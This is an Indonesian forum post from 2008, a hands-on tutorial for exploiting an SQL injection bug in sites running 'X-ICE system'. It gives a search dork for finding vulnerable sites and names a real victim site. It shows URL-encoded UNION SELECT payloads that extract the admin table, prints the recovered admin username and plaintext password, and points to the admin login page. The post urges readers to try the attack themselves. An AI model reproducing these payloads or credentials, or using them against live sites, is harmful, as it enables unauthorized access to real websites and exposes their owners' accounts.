Mig33 Surabaya Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Mig33 Surabaya Community

Mig33 Surabaya Community
 
IndeksIndeks  Latest imagesLatest images  PencarianPencarian  PendaftaranPendaftaran  Login  

 

 SQL injection pada X-ICE system v-1

Go down 
PengirimMessage
Macpirantes
New Member
New Member
Macpirantes


Male
Jumlah posting : 7
Age : 37
Lokasi : Suroboyo
Nick mig33 : ??
Registration date : 25.09.08

SQL injection pada X-ICE system v-1 Empty
PostSubyek: SQL injection pada X-ICE system v-1   SQL injection pada X-ICE system v-1 Icon_minitimeThu Sep 25, 2008 9:26 am

Hai semua saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa bulan yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah...

Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'
[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatası (eksik işleç)
/haber1/devami.asp, satır 8

Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
: -1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.
boss
Kembali Ke Atas Go down
 
SQL injection pada X-ICE system v-1
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Menghilangkan icon pada contact mig33
» mengganti nomer and negara pada nick kamu,.
» Blacklist key jadi whitelist pada kaspersky 7(KAV7 ato KIS7)
» ..:: system cleanup ::..

Permissions in this forum:Anda tidak dapat menjawab topik
Mig33 Surabaya Community :: COMPUTER :: Tricks and Codes-
Navigasi: